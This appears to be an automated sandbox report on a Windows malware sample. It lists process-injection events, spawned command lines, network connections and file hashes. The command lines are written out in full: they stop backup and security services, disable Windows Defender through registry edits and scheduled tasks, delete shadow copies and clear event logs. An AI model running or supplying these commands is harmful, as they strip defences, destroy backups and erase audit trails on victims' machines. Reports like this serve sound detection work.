PID 3440 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3240 wrote to memory of 3828 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3240 wrote to memory of 3828 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3240 wrote to memory of 3828 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 4292 wrote to memory of 3112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4292 wrote to memory of 3112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4292 wrote to memory of 3112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3440 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 4044 wrote to memory of 680 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4044 wrote to memory of 680 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4044 wrote to memory of 680 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3440 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 3440 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_12e93" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12e93" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_12e93" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.12.18:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp
DE 23.51.123.27:80 tcp
DE 23.51.123.27:80 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8097d49901b71411d15be41092f78910
SHA1 0c9fe4109d6f9036d6997002b24b278d527366f1
SHA256 014c3687a7fea07bcac7957422669c962cfb26b5778023436b08133016a52000
SHA512 0d273a20ad8de87091c445afaa8476668778ca105422d2b6341151cea9cdbea43dbd24b4637eaaabe74b171f61ae4a4b4dc941bb47d51e71ef355e4f7c16c922
